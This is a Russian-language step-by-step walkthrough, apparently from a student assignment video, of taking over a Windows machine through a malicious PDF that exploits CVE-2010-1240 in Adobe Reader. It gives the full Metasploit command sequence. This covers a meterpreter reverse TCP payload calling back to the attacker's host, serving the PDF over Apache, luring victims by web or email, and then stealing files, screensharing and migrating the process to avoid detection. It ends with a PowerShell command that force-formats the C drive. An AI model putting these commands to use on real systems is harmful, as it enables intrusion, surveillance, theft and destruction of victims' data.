
Это демонстрационное видео показывает, как мы можем управлять устройством жертвы, отправив ей безобидный на вид PDF-файл, который на самом деле содержит встроенную полезную нагрузку. Эксплойт был опубликован как CVE-2010-1240.
представлено вам
Это демонстрационное видео показывает, как мы можем управлять устройством жертвы, отправив ей безобидный на вид PDF-файл, который на самом деле содержит встроенную полезную нагрузку. Эксплойт был обнародован как CVE-2010-1240.
Как только PDF открывается в Adobe Reader, пользователи, которых мы обманом заставляем согласиться на всплывающие окна безопасности, позволяют нам получить сеанс meterpreter, подключенный к их устройствам через обратное TCP-соединение. До этого момента все их данные и то, что они делают в данный момент, находятся под нашим наблюдением.

Сначала запускаем MSFconsole, который предоставляет интерфейс командной строки для доступа к фреймворку Metasploit.
msfconsole
Затем ищем эксплойт, соответствующий нашей целевой платформе Windows и Adobe PDF Reader, который выведет целый список эксплойтов, которые можно использовать для взлома Windows-машины жертвы и эксплуатации уязвимостей Adobe PDF Reader.
search type:exploit platform:windows adobe pdf
В этой эксплуатации мы выбираем и используем модуль "adobe_pdf_embedded_exe" с помощью команды ниже, чтобы добиться цели захвата контроля над жертвой.
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Мы также можем проверить информацию об эксплойте, используя команду “info”, как показано ниже:
info
Затем устанавливаем полезную нагрузку для использования обратного TCP-соединения. Мы также используем Meterpreter, который предоставляет интерактивную оболочку, упрощая использование всевозможных функций для вставки и выполнения кода с целью исследования машины жертвы.
set payload windows/meterpreter/reverse_tcp
Затем настроим прослушивающий хост и порт. Для LHOST нужно указать IP-адрес машины атакующего, в данном случае это IP-адрес нашей Kali-машины (10.0.2.4)*.
*p.s.
# to check Kali machine’s IP address
ifconfig
set LHOST *10.0.2.4*
set LPORT 5665
Затем установим входной файл для основы PDF с флагом INFILENAME*. Далее зададим имя файла, которое привлечет интерес жертвы к открытию вредоносного PDF-файла.
*p.s.
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
Мы можем снова просмотреть наши параметры перед вводом команды “exploit” для генерации полезной нагрузки вместе с PDF.
# Then we can show the info or options by
show info | show options
exploit
После того как мы сгенерировали PDF-файл, переместим его в /var/www/html — каталог нашей Kali-машины для размещения веб-сервера приложений, чтобы жертва могла позже скачать PDF-файл.
Note:
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
Затем для настройки нашего слушателя воспользуемся "exploit/multi/handler". Снова установим полезную нагрузку, LHOST, LPORT в соответствии с тем, что мы определили при генерации вредоносного PDF-файла. Затем запустим полезную нагрузку.
Note:
show info or show options — необязательные команды. Они нужны только для проверки того, что вы только что установили.use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
В другом терминале проверяем статус сервера Apache, чтобы убедиться, что он работает и размещает наш PDF-файл в /var/www/html для скачивания жертвой.
service apache2 status
# If it is inactive, start the service
service apache2 start
На Windows-машине откройте любой браузер, например Chrome, и введите IP нашей Kali (10.0.2.4)* для доступа к веб-серверу приложений Kali-машины.
*Примечание: Пожалуйста, укажите IP-адрес вашей собственной Kali-машины
Затем имитируйте сохранение целевого PDF-файла пользователем.
Как только жертва открывает файл в Adobe Reader 8.1.2 и принимает запросы безопасности, мы можем наблюдать на нашей Kali-машине новую сессию, подключенную через обратное TCP-соединение.
В реальном сценарии мы настроим веб-сайт с PDF-файлом, содержащим полезную нагрузку, чтобы жертва могла скачать файл или мы прикрепим его к письму.
Затем мы можем удаленно получить доступ к машине жертвы и выполнять другие вредоносные действия по нашему желанию в сеансе meterpreter.
help
pwd
ls
Например, если есть файл с именем password.txt, мы можем выполнить команду download password.txt
download [folder name | filename with extension]
Конечно, мы можем написать вредоносный скрипт (внедрить бэкдор), чтобы сохранить подключение к Windows-машине, если мы действительно злые! 💀
# Boot command prompt at background
execute -f cmd.exe -H -i
# Create file on Windows
echo "You have been hacked" > hack.txt
#open the txt file we have just created
hack.txt
# Take screenshot
screenshot
# Watch the remote user in real time
screenshare
Однако атакующий может снизить подозрения, мигрировав процесс meterpreter в другой с помощью модуля migrate в сеансе meterpreter.
meterpreter> run post/windows/manage/migrate
Здесь он автоматически создаст новый процесс на машине жертвы, в который сможет мигрировать. Жертва сможет удалить зараженный PDF-файл, совершенно не подозревая, что процесс уже переместился в другое место.
Атакующий может также создать вредоносный скрипт на целевой машине с помощью командной строки (cmd) или PowerShell, который способен вывести из строя всю операционную систему.
meterpreter> shell
# Start the Windows PowerShell
powershell
#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false